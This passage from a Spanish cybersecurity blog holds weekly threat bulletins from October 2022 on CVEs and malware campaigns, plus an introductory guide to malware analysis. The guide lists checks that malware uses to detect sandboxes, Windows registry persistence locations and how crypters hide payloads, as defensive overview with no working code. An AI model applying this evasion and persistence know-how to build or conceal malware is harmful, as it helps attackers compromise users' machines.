realizar inventarios y preparar sus sistemas, desde OpenSSL no creen que sea suficiente para que los atacantes logren descubrir la vulnerabilidad, tal y como ha afirmado Mark J. Cox, miembro del equipo. Más info → * * * Vulnerabilidad en Zoom podría exponer a los usuarios a ataques de phishing Zoom ha publicado un boletín de seguridad donde corrige una vulnerabilidad susceptible a un análisis de URL. Catalogada como CVE-2022-28763 con un CVSS de 8.8, el fallo podría ser aprovechado por un actor malicioso mediante una URL de reunión de Zoom especialmente diseñada, con el fin de redirigir a un usuario hacia una dirección de red arbitraria, posibilitando así otros tipos de ataques adicionales, incluyendo la toma de control de la sesión activa. Los productos afectados por esta vulnerabilidad serían Zoom Client for Meetings (para Android, iOS, Linux, macOS, y Windows), Zoom VDI Windows Meeting Clients, y Zoom Rooms para Conference Room (para Android, iOS, Linux, macOS, y Windows), todos en las versiones anteriores a la versión 5.12.2. Desde Zoom recomiendan actualizar o descargar el software más reciente. Más info → * * * Drinik: troyano bancario para Android que reaparece con capacidades avanzadas Analistas de Cyble han detectado una nueva versión del malware bancario Drinik, dirigido a sistemas Android, y actualmente apuntando contra 18 entidades bancarias de la India. Según el reporte de Cyble, el troyano se hace pasar por la aplicación oficial de administración de impuestos del país (iAssist) para robar la información personal y las credenciales bancarias de las víctimas. Una vez instalada en el dispositivo de la víctima, la aplicación solicita permisos de escritura en el almacenamiento externo, recibir, leer y enviar SMS, y leer el registro de llamadas. Además, solicitará permiso para hacer uso del servicio de accesibilidad de Android, lo que deshabilitará Google Play Protect y capacitará al malware para realizar gestos de navegación, grabar la pantalla y capturar pulsaciones del teclado y credenciales del usuario, mostrando en la app el sitio legítimo de impuestos sobre la renta de la India. Como objetivo final, Drinik redirige a las víctimas a una web de phishing del Departamento de Impuestos sobre la Renta donde, bajo el pretexto de una devolución a su favor, solicitará al usuario su información financiera, incluido el número de cuenta, y número, CVV y PIN de la tarjeta de crédito. Drinik es conocido desde 2016 y no ha parado de evolucionar mejorando continuamente sus capacidades y planteándose objetivos masivos, como los contribuyentes y clientes bancarios indios en este caso Más info →
28 de octubre de 2022
Boletín semanal de Ciberseguridad, 15-21 de octubre
Grupo Noname057(16) ataca al Ministerio de Defensa Durante el pasado fin de semana, el actor malicioso Noname057(16) habría realizado un ataque contra las páginas del Ministerio de Defensa español, dejándolas inaccesibles durante un breve periodo de tiempo. Noname057(16) se trata de un grupo con objetivos políticos y que suele realizar ataques de denegación de servicio contra sus víctimas, instituciones y empresas pertenecientes a países miembros de la Unión Europea y de la OTAN, especialmente en los sectores públicos, de transporte y de telecomunicaciones. Este grupo llevaría realizando este tipo de ataques desde mediados de marzo de este año, fecha en la que se crea su canal de Telegram, pero habría ganado notoriedad desde el verano. Adicionalmente, el grupo habría reclamado en los últimos días que no se le confunda con el grupo Killnet, que tiene un perfil y modus operandi parecido. Más info → * * * Microsoft informa acerca de un endpoint propio mal configurado Microsoft Security Response Center ha informado acerca de la corrección de un endpoint mal configurado, que podría haber dado lugar a un acceso no autorizado a los datos contenidos en este. La información que podría haber sido expuesta, correspondería con transacciones comerciales entre Microsoft y clientes, incluyéndose información confidencial como nombres propios, direcciones de correo electrónico, contenido de correos electrónicos, nombres de empresas, números de teléfono, o documentos adjuntos. Microsoft tuvo conocimiento de este endpoint mal configurado el pasado 24 de septiembre gracias a un aviso de SOCRadar, procediendo entonces a solventar el riesgo. De acuerdo con la información publicada por Microsoft, no se habría detectado por el momento indicios de que las cuentas o sistemas de los clientes estuvieran comprometidas, y han señalado que habrían avisado directamente a todos los clientes afectados. Más info → * * * Vulnerabilidad crítica en Apache Commons Text Recientemente se ha revelado una vulnerabilidad crítica en Apache Commons Text que permitiría a un atacante no autenticado la ejecución remota de código (RCE) en servidores que ejecutan aplicaciones con el componente afectado. Identificada con el CVE-2022-42889 y un CVSS de 9.8, el fallo afecta a las versiones 1.5 a 1.9 de Apache Commons Text y se ubica en los valores predeterminados inseguros en el momento que Apache Commons Text realiza la interpolación de variables, lo que podría conducir a una ejecución de código arbitrario en servidores remotos. Según la propia fundación Apache, la librería Commons Text de Apache estaría presente en más de 2.500 proyectos y recomienda actualizar cuanto antes a la versión Apache Commons Text 1.10.0, que desactiva los interpoladores que presentan problemas de forma predeterminada. Por otra parte, diversos investigadores de seguridad han señalado la disponibilidad de forma pública de una prueba de concepto (PoC) para esta vulnerabilidad, hecho que agrava el riesgo considerablemente, y otras fuentes han llegado a comparar este error con la conocida vulnerabilidad Log4j, aunque parece probable que su impacto sea menos generalizado y por el momento no se conocen reportes sobre su posible explotación activa en la red. Más info → * * * BlackLotus: malware de alta sofisticación a la venta en foros clandestinos Diferentes investigadores de seguridad habrían detectado a un actor amenaza vendiendo una herramienta denominada BlackLotus en foros clandestinos, con capacidades que, hasta el momento, solo se habrían observado en grupos y actores patrocinados por estados. Esta herramienta, un tipo de UEFI bookit, se instalaría en el firmware del equipo y permitiría evadir su detección por parte de las soluciones de seguridad al cargarse en las fases iniciales de la secuencia de arranque del dispositivo. Según indica el autor de la herramienta en su publicación, BlackLotus contaría con características para detectar actividad en máquinas virtuales y presenta protecciones contra su eliminación, de esta manera se trata de dificultar el análisis del malware. En último lugar, cabe indicar que, según el investigador de seguridad Scheferman, hasta que no se analice por completo una muestra de este malware, no se podría descartar la posibilidad que Blacklotus pudiese ser utilizado para realizar ataque Bring Your Own Driver (BYOVD). Más info → * * * PoC disponible para vulnerabilidad crítica de Fortinet Durante los últimos días, se ha publicado en GitHub una prueba de concepto (PoC) que aprovecha el fallo de seguridad crítico que afecta a los productos Fortinet FortiOS, FortiProxy y FortiSwitchManager y que fue reportado durante la pasada semana bajo la codificación CVE-2022-40684. En concreto, la explotación de esta vulnerabilidad podría permitir a un atacante remoto realizar una omisión de autenticación, derivando sus acciones en la realización de operaciones maliciosas en la interfaz administrativa a través de solicitudes HTTP(S). Además, según Horizon3.ai, tras un análisis de la PoC, indican que FortiOS expondría un portal web de gestión, permitiendo al usuario configurar el sistema. Cabe destacar que, cuando la PoC se publicó en fuentes abiertas, Fortinet ya había notificado la explotación activa de la vulnerabilidad. Sin embargo, el viernes Fortinet publicó un aviso en el que se incluye una guía de mitigación, así como actualizaciones y soluciones para los clientes. Finalmente, cabe destacar que investigadores de GreyNoise y Wordfence han publicado la detección de intentos de explotación. Más info →
21 de octubre de 2022
Boletín semanal de ciberseguridad, 7 — 14 de octubre
Vulnerabilidad crítica en Fortinet Fortinet ha emitido un aviso de seguridad a sus clientes donde insta a actualizar sus firewalls FortiGate y proxy web FortiProxy, con el fin de corregir una vulnerabilidad crítica de omisión de autenticación que podría permitir a atacantes remotos iniciar sesión en dispositivos sin parchear. La vulnerabilidad ha sido identificada con el CVE-2022-40684 y, por el momento no tiene criticidad CVSS asociada según el fabricante, aunque algunos investigadores estiman que podría alcanzar una puntuación de 9.8. El fallo reside en la interfaz administrativa donde, utilizando rutas o canales alternativos en FortiOS y FortiProxy, un atacante no autenticado podría llegar a realizar operaciones a través de solicitudes HTTP o HTTPS especialmente diseñadas. Las versiones vulnerables son FortiOS 7.0.0 a 7.0.7, FortiOS 7.2.0 a 7.2.2 y FortiProxy 7.0.0 a 7.0.7 y 7.2.0., quedando solucionada la vulnerabilidad con las nuevas versiones FortiOS 7.2.1 y 7.2.2 y FortiProxy 7.2.1. Asimismo, en caso de no ser posible implementar estas actualizaciones, Fortinet ha recomendado limitar las direcciones IP que pueden llegar a la interfaz administrativa mediante una política local, e incluso deshabilitar las interfaces de administración remota para garantizar que se bloqueen los posibles ataques hasta que se pueda realizar la actualización. Por el momento no se conocen reportes sobre la posible explotación activa de este fallo por actores amenaza, si bien según el buscador Shodan, existen más de 100.000 firewalls FortiGate accesibles desde Internet. Más info ⇾ * * * LofyGang se centra en ataques a la cadena de suministro Investigadores de Checkmarx han publicado un informe acerca del actor amenaza focalizado en ataques a la cadena de suministro, conocido como LofyGang. De acuerdo con Checkmarx, la última campaña llevada a cabo por el grupo desde el año 2021 estaría centrada en infectar las cadenas de suministro de software open source con paquetes NPM maliciosos. Los objetivos de los atacantes estarían focalizados en obtener información de tarjetas de crédito, o el robo de cuentas de usuario, entre las que se encontrarían cuentas premium de Discord, o de servicios como Disney+ o Minecraft, entre otras. En la ejecución de los ataques, se valen de todo tipo de TTPs, entre las que incluyen el typosquatting, apuntando a errores de escritura en la cadena de suministro, o el “StarJacking", vinculando la URL del paquete legitimo a un repositorio de GitHub no relacionado. El grupo, que se cree que podría ser de atribución brasileña, se comunica principalmente a través de Discord. Además, disponen de un canal de YouTube y colaboran con varios foros clandestinos con el nickname DyPolarLofy, promocionando sus herramientas y vendiendo las credenciales que han obtenido. Por otro lado, el grupo dispone de un GitHub donde ofrecen sus repositorios de código abierto ofrecen herramientas y bots para Discord. Cabe destacar que los investigadores de Checkmarx han creado una web para poder seguir las actualizaciones de sus hallazgos y un repositorio con los paquetes maliciosos descubiertos hasta el momento. Más info ⇾ * * * Emotet resurge con nuevos mecanismos para la evasión Investigadores de VMware Threat Analysis Unit han publicado un informe donde analizan la resurrección del grupo detrás del malware-as-a-service (MaaS) Emotet, grupo al que se le conoce como Mummy Spider, MealyBug o TA542. Este nuevo resurgimiento del malware llega tras su desmantelamiento por parte de las fuerzas del orden internacionales en enero de 2021. Los investigadores analizaron datos de correos spam, URLs y archivos adjuntos recopilados de campañas de principios de año, llegando a la conclusión de que las botnets de Emotet están en constante evolución para dificultar la detección y el bloqueo por parte de los equipos de defensa. Esto lo logran gracias a funcionalidades para ocultar sus configuraciones, crear cadenas de ejecución más complejas y modificar constantemente su infraestructura de command and control (C2). Además, han ampliado y mejorado la capacidad de robo de tarjetas de crédito y su mecanismo para la propagación lateral. La distribución del software malicioso se basa en envíos masivos de correos electrónicos con enlaces o documentos adjuntos maliciosos. Más info ⇾ * * * Microsoft soluciona 84 vulnerabilidades en su Patch Tuesday, dos de ellas 0-day Microsoft ha corregido en su Patch Tuesday correspondiente al mes de octubre 84 vulnerabilidades, entre las que se encuentran dos 0-day, uno de ellos activamente explotado, y 13 fallos críticos que permitirían la elevación de privilegios, suplantación de identidad o la ejecución remota de código. El 0-day activamente explotado, identificado como CVE-2022-41033 y CVSS 6.8, fue descubierto por un investigador anónimo y afecta al servicio del sistema de eventos COM+ de Windows, permitiendo que un atacante pueda obtener privilegios de sistema. Por otro lado, el segundo 0-day que, según Microsoft, únicamente se ha divulgado públicamente, se ha catalogado como CVE-2022-41043 y con un CVSS temporal de 2.9. En este caso, el error consiste en una vulnerabilidad de divulgación de información en Microsoft Office que podría permitir a un atacante obtener acceso a los tokens de autenticación de los usuarios. Referente a los otros dos 0-day conocidos recientemente en el servidor Exchange (CVE-2022-41040 y CVE-2022-41082), Microsoft aclara que por el momento no ha publicado actualizaciones de seguridad que las solucionen y remite a su publicación del pasado 30 de septiembre, que incluye una guía para aplicar mitigaciones a estas vulnerabilidades. Más info ⇾ * * * Alchimist: nuevo framework de ataque dirigido a Windows, Linux y macOS Investigadores de Cisco Talos han descubierto una nueva herramienta de ataque, con capacidades de command and control (C2), diseñada para apuntar a sistemas Windows, Linux y macOS. Nombrada como “Alchimist”, la publicación de Cisco señala que todos los archivos de la herramienta son ejecutables de 64 bits y están desarrollados en el lenguaje de programación GoLang, características que facilitan la compatibilidad con diferentes sistemas operativos. Su funcionamiento se basa en una interfaz web que permite generar y configurar cargas útiles implementadas en dispositivos infectados, destinadas a tomar capturas de pantalla, lanzar comandos arbitrarios e incluso ejecutar código de forma remota. Además, Alchimist es capaz de introducir un nuevo troyano de acceso remoto (RAT) denominado “Insekt” mediante código PowerShell para Windows, wget para sistemas Linux y, en el caso de macOS, sustituido por un exploit de escalada de privilegios (CVE-2021-4034) en la utilidad pkexec de Polkit. Una vez implementado, el troyano establecerá comunicación con la infraestructura C2 de los atacantes a través de la interfaz de Alchimist y diferentes protocolos de comunicación como TLS, SNI, WSS/WS, siendo sus principales finalidades la recopilación de información y la ejecución de comandos. Más info ⇾
17 de octubre de 2022
Boletín semanal de ciberseguridad, 1 — 7 de octubre
Lazarus apunta a Dell mediante un nuevo rootkit FudModule Investigadores de ESET han informado acerca de una nueva campaña de Lazarus apuntando hacia un controlador de hardware de Dell mediante un nuevo rootkit denominado FudModule. El rootkik abusa de una técnica denominada bring your own vulnerable driver (BYOVD) para explotar una vulnerabilidad en un controlador de hardware de Dell por primera vez. Esta técnica conocida como BYOVD, se produce cuando los actores maliciosos cargan controladores legítimos y firmados en Windows que cuentan con vulnerabilidades conocidas. La campaña, cuyo objetivo es el espionaje y robo de datos, se llevó a cabo mediante spear-phishing desde otoño de 2021, afectando a objetivos en Países Bajos y Bélgica. Los correos maliciosos enviados se presentaban como ofertas de trabajo, y desplegaban cargadores de malware (droppers), y puertas traseras personalizadas. La herramienta más notable fue un módulo de modo de usuario que obtuvo la capacidad de leer y escribir en la memoria del kernel debido a la vulnerabilidad CVE-2021-21551. Esta vulnerabilidad afectaba a un controlador de hardware de Dell legítimo (dbutil_2_3.sys) y ha permanecido explotable durante 12 años hasta que el fabricante ha emitido actualizaciones de seguridad para corregirla. Leer más ⇾ * * * Evolución del malware Bumblebee El equipo de investigadores de Checkpoint ha publicado una investigación en la que destacan la constante evolución de este software malicioso, descubierto a principios del presente año. Checkpoint subraya varias características que confirman los constantes cambios producidos por Bumblebee. Entre ellos se destaca el vector de entrada utilizado para su distribución, el más común ha sido inyectar una DLL dentro de un archivo ISO, sin embargo, esto fue modificado en el pasado al utilizar un archivo VHD, y nuevamente han vuelto a la entrega en formato ISO mediante campañas de malspam. En consecuencia, los investigadores señalan la inclusión de mecanismos de comprobación en entornos de sandbox, con el propósito de evitar un análisis de malware. Asimismo se estima que, hasta el pasado mes de julio, los servidores de Command & Control (C2) de Bumblebee solo aceptaban una víctima infectada en la misma dirección IP, es decir, si varios equipos en una organización que acceden a internet con la misma IP pública están infectados, el servidor C2 solo aceptaba una, actualmente ya pueden comunicarse con múltiples sistemas infectados en la misma red. En último lugar, los investigadores indican que es muy probable que, según las características de la red del sistema infectado, en fases posteriores Bumblebee despliegue stealers o herramientas más complejas de post explotación como CobaltStrike. Leer más ⇾ * * * Vulnerabilidad crítica en el repositorio de paquetes PHP Packagist El equipo de Sonar ha publicado el hallazgo de una nueva vulnerabilidad crítica que afecta a Packagist, repositorio oficial de paquetes que usa Composer, el administrador de paquetes PHP más grande del mundo. El fallo de seguridad, catalogado como CVE-2022-24828, CVSS de 8,8, permite ejecutar comandos arbitrarios en el servidor que ejecuta la instancia de Packagist. Explotando esta vulnerabilidad un atacante podría modificar la información de los paquetes de software PHP existentes, llegando a cambiar la ruta de la descarga de estos, este tipo de ataques es conocido como ataques a la cadena de suministro (supply chain attack), una de las técnicas más efectivas. Según informan los investigadores, de los dos mil millones de descargas de componentes que se realizan con Composer al mes, aproximadamente 100 millones de estas necesitan los metadatos que ofrece Packagist. La vulnerabilidad fue corregida de manera inmediata en una actualización en las versiones 1.10.26, 2.2.12 o 2.3.5. de Composer. Leer más ⇾ * * * ProxyNotShell: Fallos y correcciones para vulnerabilidades en Exchange El equipo de Microsoft ha realizado publicaciones acerca de las vulnerabilidades en Microsoft Exchange Server, catalogadas como CVE-2022-41040 y CVE-2022-41082 aunque todavía no se han publicado parches que corrijan estos fallos. A la espera de dichos parches, Microsoft publicó un script para aplicar mitigaciones basadas en la reescritura de URLs que, tal y como publicaron algunos investigadores, podían ser eludibles. Ante esto, Microsoft corrigió dichas mitigaciones temporales cuyas condiciones, sin embargo, han vuelto a quedar en entredicho después de que el investigador Peter Hiele haya demostrado que una de ellas, el filtrado de strings en identificadores URI no tenía en cuenta la codificación de caracteres, lo que hacía que las medidas de Microsoft no funcionaran. Este descubrimiento fue confirmado por otros investigadores, lo que ha llevado a que Microsoft tenga que volver a corregir una vez más sus mitigaciones. Asimismo, el investigador Kevin Beaumont ha apuntado que las publicaciones de Microsoft sobre las vulnerabilidades están enfocadas a proteger servidores on-premise, dejando fuera los de configuración híbrida. Entre tanto, se han detectado intentos de escaneo en búsqueda de sistemas vulnerables a los fallos, conocidos como ProxyNotShell, desde IPs identificadas como maliciosas. Finalmente, se han empezado a registrar los primeros intentos de venta de exploits para las vulnerabilidades a través de la plataforma GitHub. Sin embargo, estos exploits estarían resultando ser falsos, constituyendo intentos de estafa a cambio de altas sumas de dinero en criptomonedas sin que el código sirva para explotar ProxyNotShell. Leer más ⇾ * * * Vulnerabilidad en macOS recientemente publicada La empresa especializada en análisis de software de Apple, Jamf, ha publicado detalles de una investigación realizada por su investigador Ferdous Saljooki acerca de una vulnerabilidad que afecta al sistema operativo macOS. En concreto se trata de un fallo en la función Archive Utility que podría permitir la ejecución de aplicaciones maliciosas no autorizadas y sin firmar, y que se saltaría todas las protecciones y advertencias incluidas por Apple habitualmente. El fallo se debe a que esta función Archive Utility no añade la etiqueta de cuarentena diseñada por Apple a los archivos cuando trata de descomprimir archivos con dos o más carpetas o subarchivos en su directorio root. Las etiquetas de cuarentena son normalmente incluidas por el sistema cuando se trata de ejecutar un software que no es de confianza o que no da información sobre su desarrollador, y hace que se someta análisis y que el usuario tenga que autorizarlo manualmente para evitar la instalación de programas no deseados. Al no incluirse estas etiquetas, los atacantes podrían ejecutar software malicioso sin control de la víctima. La vulnerabilidad ha recibido el identificador CVE-2022-32910 y, aunque fue parcheada por Apple en boletines de mayo y julio, se ha dado a conocer en los últimos días. Leer más ⇾
7 de octubre de 2022
Introducción al análisis de malware: tipos que existen, síntomas y cómo identificarlos
Cuando hablamos de malware en muchas ocasiones no nos damos cuenta de la amplitud de esa palabra. Que el malware es algo dañino está claro, y que provoca el mal funcionamiento del equipo una vez afectado, también. Pero, ¿qué tipos de malware existen, cuáles son los síntomas y cómo podemos identificarlos? Tipos de malware Partiendo de la base de que malware es cualquier programa informático diseñado para causar algún daño, podemos realizar la siguiente clasificación, que si bien no es la única sí es la más común: Virus: es un programa que se replica o propaga por los equipos con la ayuda del usuario. Gusanos: es lo mismo que el anterior sin la ayuda del usuario. Troyano: programa que pasa desapercibido. RAT: troyano de acceso remoto. Backdoor: programa que permite acceder remotamente o ejecutar comandos. Downloader o dropper: programa que descarga y ejecuta otro malware. Hacktool: programas utilizados para realizar diferentes tipos de ataques, aunque no tienen por qué ser maliciosos. Ransomware: programa que cifra los ficheros de los usuarios y solicita un rescate para su descifrado. Bot: programa que interactúa con otro de manera automática (comunes en IRC). Rootkit: programa que se oculta y que permite acceder al atacante con privilegios elevados y continuada. Keylogger: programa que captura las pulsaciones de teclado para informar posteriormente al atacante. Software de Minería: programa para realizar minería de criptomonedas como Bitcoin o similares en el equipo afectado. Info Stealer: programa que busca contraseñas o información personal para sustraerlas. Spyware: software que recopila actividad del usuario sin su permiso para enviarlas a su autor. PUP/PUA: programas no deseados como las barras de explorador, entre otras. Adware: malware que muestra continuamente publicidad. Si os preguntáis si solamente afecta a ordenadores y sistemas operativos Microsoft Windows la respuesta es “no, en absoluto”. El malware afecta a todos los sistemas operativos, incluyendo todo los más conocidos: Linux, macOS, Windows, Android, iOS… Lo que significa que optar por uno u otro supone estar a salvo de una infección, o al menos no completamente a salvo. Todos los sistemas operativos pueden verse afectados de un modo u otro por malware. Síntomas de estar afectado por malware Los síntomas pueden ser muy variados y muy diferentes dependiendo del sistema operativo, del tipo de dispositivo y, por supuesto, del tipo de malware del que se trate y de cuál sea un propósito. Algunos de los síntomas más comunes incluyen: El ordenador se ralentiza, comienza a ir más lento. Aparecen ventanas con mensajes que te felicitan por haber ganado un móvil o te ha tocado un cheque-regalo de 500 euros para un tienda online. Mensajes de error del sistema operativo; por ejemplo, la pantalla azul característica de Windows. El disco duro empieza a quedarse sin espacio e incluso se llena, sin motivo aparente. Aparecen utilidades, aplicaciones o barras de de herramientas (por ejemplo, en el navegador web) que no recuerdas haber instalado. El ventilador del ordenador empieza a funcionar de forma constante o errática Archivos, como fotografías, cambian de extensión o tipo de archivo Aparece un archivo llamado README que dice, literalmente, que tu información está cifrada ... Cualquiera de estos síntomas indica que, muy probablemente, tu ordenador está afectado por alguno de los tipos de malware que hemos mencionado en el apartado anterior. CYBER SECURITY Dime qué malware tienes y te diré a qué botnet perteneces 14 de septiembre de 2022 Cómo se cuela el malware en tu ordenador Generalmente suelen llegar por correo a modo de phishing, que es un término asociado a los correos recibidos en los que se busca engañar al receptor haciéndose pasar por alguien de confianza como una persona amiga, empresa o servicio de confianza como pueden ser una entidad bancaria, empresas de mensajería o de servicios como agua o luz, etc. Su propósito es manipular al receptor del mensaje para conseguir que ejecuten alguna acción, como abrir una URL o un archivo adjunto. Otra forma de entrada habitual del malware es en forma de software legítimo disponible en páginas de descarga de software o tiendas de apps de terceras. Y, ¿quién no ha buscado la manera de hacer funciona un programa con un generador de números de serie? Pues no os fieis nunca porque los ejecutables de tipo “cracks.exe” no suelen traer nada bueno. Otros, en cambio, llegan sin intervención del usuario. Como en el caso de WannaCry —al que acompañaba un ransomware— o antes Conficker, Blaster, Slammer, Sasser… Dependiendo de cuál sea el malware la solución puede ser más o menos fácil. Eso sí, esperemos que no sea un ransomware porque, aunque también puede tener solución, nunca es recomendable pagar ya que eso dará pie a que ese tipo de ataque se siga produciendo. ¿Qué hacer si nos llega algo y no sabemos qué es? De entrada, nunca debemos abrir y menos aún ejecutar un archivo cuyo origen o propósito desconocemos, incluso cuando llega, por ejemplo por email, de un remitente conocido o de confianza. En ese caso lo mejor es preguntar al remitente. También existen herramientas online que son útiles para conocer de qué se trata. Plataformas de Análisis online para el análisis de malware Las más utilizadas son estas: Virus Total Any-Run Tria-ge Joe Sandbox CAPE Sandbox Algunas requieren registro y, en general, una vez registrados se dispone de un número limitado de muestras. Si os dedicáis al mundo de la Ciberseguridad necesitaréis otro tipo de licencia ya que la versión gratuita se os quedará pequeña enseguida. ¿Son infalibles estas herramientas? No, por desgracia no lo son. Pero sí suelen ser de gran ayuda. Incluso cuando no son capaces de detectar la familia de malware a la que pertenece suelen dar al menos pistas que ayuden a identificarlo con algo de investigación adicional. Algún Indicador de Compromiso (IoC) obtendrás de estas plataformas, como en este ejemplo: Técnicas de detección que utiliza el malware Los programadores de malware conocen muy bien estas plataformas y son capaces de añadirles ciertos códigos que identifican dónde están siendo ejecutados. Las principales medidas que buscan en estos entornos son: Número de cores del procesador. Tamaño del disco duro. Que el ratón se mueva. Dirección MAC de la tarjeta de red. Alguna clave de registro perteneciente a máquinas virtuales. Nombre de la máquina o usuario autenticado. Ciertos procesos en ejecución (Antivirus, EDR, etc.) Idioma del teclado. Sistema operativo instalado. El nombre del malware o su ruta de ejecución. Si el programa está en modo depuración. Dirección IP de salida a internet. Número de documentos abiertos o recientes. Fecha y hora de ejecución (Sleep) ... En caso de detectar algunas de éstas herramientas —incluso máquinas virtuales que utilizan algunas de estas herramientas— el malware no se llega a ejecutar, o bien proporciona datos de salida falsos para enmascarar su naturaleza. CYBER SECURITY Cómo funciona Lokibot, el malware que utiliza Machete para robar información y credenciales de acceso 29 de junio de 2022 Ejemplos de persistencia Si el malware se ve en un entorno amigable, es decir, cree que no está siendo detectado, entonces suele crear una clave en el Registro de Windows (método más común) para arrancarse cada vez que el usuario inicia sesión. De esta forma se asegura que si apaga el equipo o el proceso falla inesperadamente volverá a iniciarse en cada sesión. Hay varios sitios en los que crear la clave, AutoStart (HKLM / HKCU\ … RunOnce o Run), WinLogon Process (HKLM\ … Winlogon), BootExecute Key (HKLM\ … Session Manager), Startup Keys (HKLM / HKCU\ … User Shell Folders), Services (HKLM\ … RunservicesOnce o Runservices), Browser Helper Objects (BHO), AppInit DLL’s (HKLM\ … AppInit_DLL), etc. O simplemente acaba en el directorio de inicio del usuario o de todos los usuarios para tener más posibilidades de infección (siempre y cuando tenga permisos). Herramientas como Autoruns nos ayudan a identificar si algo no nos cuadra, si tenemos algún nombre desconocido en alguna de estas claves o algún ejecutable que no conozcamos, esta utilidad te permite borrar la clave directamente, eso sí, con cuidado de saber lo que se está haciendo, el Registro de Windows es muy delicado, una vez que borres la clave, ya no podrás recuperarla, así que antes de nada, ¡BACKUP del Registro! Ocultando el Malware final El malware, en general, no llega tal cuál sale del proceso de compilado. De esta forma sería más rápido analizarlo. No, no, se suele utilizar programas llamados Crypters que pueden cifrar, ofuscar, comprimir, añadirle otros iconos y funciones que sean capaces de detectar procesos antivirus, detección de depuradores, ejecución en máquinas virtuales, etc. El programa que crea el malware con las opciones mencionadas se llama Builder, y el que lo extrae de sí mismo y lo descifra para ejecutarlo se llama Stub. Una vez descifrado hay dos opciones: descargarlo a disco (Scantime) ejecutarlo en memoria (Runtime) Es más común ejecutarlo en memoria para dificultar así su detección por parte de los Antivirus. Existe mucho malware que no se ha subido aún a plataformas de análisis online por esta razón, al ejecutarse en memoria no se dispone de él en un fichero para poderlo subir y que se encarguen de decirnos qué tipo de malware es o a donde se conecta. Los analistas de malware los aterrizan al disco duro para que puedan ser analizados de dos formas que veremos a continuación. Pero antes, seguro que os estaréis preguntando como de fácil es conseguir este tipo de malware. Es más fácil de lo que os creéis. A menudo sale a la luz el Builder con el que se genera un malware, incluso su código fuente. Esto permite ampliar las capacidades del mismo y diferentes evoluciones por parte de terceros. Esta es la razón por la que se suele ver cómo ciertos tipos de malware comparten código: si el código está disponible nada impide a otro utilizarlo. Volvamos ahora a los dos métodos que hay para analizar malware. 1. Análisis estático, sin ejecutar el malware Durante un análisis estático no se llega a ejecutar la muestra, así que estamos a salvo de infectarnos. Los métodos utilizados son varios, principalmente: Desempaquetado del malware, si lo está (Crypters). Obtención de las cadenas (comando strings, acordaros de strings -e l, además del otro). Usad también Floss, obtendréis resultados que seguramente no esperéis. Identificación de muestras con reglas Yara (es mejor si sabemos lo que vamos a analizar, el tiempo corre…). Enumeración de funciones API o Application Programming Interfaces (no van a estar todas, pero te pude dar una idea del comportamiento). Desensamblado y decompilado (a menudo, el pseudocódigo en C/C++ es más entendible) del malware. Comprensión del flujo del malware. Obtención de la configuración del malware (si la tiene), el comportamiento, IOC, información útil, etc. 2. Análisis dinámico, ejecutando el malware (¡cuidado!, te vas a infectar) Le toca el turno al análisis dinámico. Este pretende certificar lo que hemos visto en el análisis estático. Hay veces que en el análisis estático no se ve de forma rápida lo que sucede, por ejemplo, en funciones donde están cifrados los datos, se le aplica el algoritmo que sea y mágicamente aparece la cadena que estábamos buscando. ¿Os acordáis de esas herramientas de análisis online? Pues son una ayuda para identificas posibles API en donde debemos poner breakpoints o puntos de ruptura en el debugger para poner especial atención en ellas. En un análisis dinámico se miran los procesos que se crean, la creación o modificaciones de ficheros o claves del Registro de Windows, tráfico de red, servicios que se crean o modifican, Mutex utilizados y con todo esto y lo que habíamos visto en el análisis estático deberíamos tener una idea exacta de lo que estamos analizando, deberíamos ponerle un nombre al malware. CYBER SECURITY Snip3, una investigación sobre malware 23 de diciembre de 2021 Herramientas de ayuda para el analista Existen una serie de herramientas en las que apoyarnos a la hora de estos análisis como los desensambladores (para convertir el lenguaje máquina a ensamblador) como son IDA, Ghidra, Radare, etc. Aquí podemos ver un ejemplo, es así como solemos ver el Malware. Tenemos los decompiladores (herramientas que convierten el código del Malware en un lenguaje a alto nivel más fácil de interpretar para para un humano). ¿Siempre se puede hacer esto? No, depende del lenguaje y compilador utilizados. DnSpy (.Net) y Jadx (Java) son bastante fiables. Por otro lado, tenemos los que te muestran un pseudocódigo que ayudan mucho en la compresión del código como por ejemplo los tres que se mencionaron como desensambladores. Pero cuidado, aunque no son 100% fiables, sin duda, hay que utilizarlos. Los depuradores son programas que nos ayudan a entender el comportamiento del malware según se esté ejecutando, así que cuidado, un ejecutar de más y te has infectado. Los más utilizados actualmente son x64dbg y Windbg. De nuevo, los tres que se mencionaron como desensambladores tienen esta función, así que el que más le guste al analista. Aún se siguen utilizando otros más antiguos como Ollydbg e Immunity Debugger (igual que el anterior con el plus de poder ejecutar scripts de Python para automatizar análisis), aunque cada vez menos. Este último es utilizado a la hora de analizar exploits gracias a scripts destinados al análisis de estos. ¿Alguien conoce Mona? Otras herramientas de apoyo son las utilidades de Sysinternals (Process Explorer, Process Monitor, Tcpview, Autoruns, etc.). Un capturador de tráfico, siempre es necesario saber qué se está enviando por la red y hacia dónde como, por ejemplo, Wireshark. La herramienta Yara para poder utilizar miles de reglas que existen para la detección de casi cualquier cosa. Tratar de realizar un listado de herramientas es complicado ya que cada uno suele utilizar las que más le gusta para cada tipo y cada Malware es un mundo, no se utilizan las mismas. Os animo a investigar sobre ellas. Reflexión final Cada día salen cientos y cientos de nuevos malware de todo tipo, así que no nos podemos despistar. Hay que estar al día sobre las diferentes familias que existen y sus evoluciones y visitar todas las plataformas online en donde los afectados suben las muestras para conocer qué les ha afectado, así que tenéis un buen punto de partida para detectar tanto lo antiguo como lo nuevo. Usadlas para comprender el comportamiento, para buscar nuevos sitios a los que se conectan para enviar la información que buscan, para generar reglas propias de detección, para buscar nuevas muestras aún sin catalogar, etc. Sin duda, el mundo del análisis de malware es apasionante y en constante evolución. Autor: Servicio de Análisis de Malware
6 de octubre de 2022
Boletín semanal de ciberseguridad, 24 — 30 de septiembre
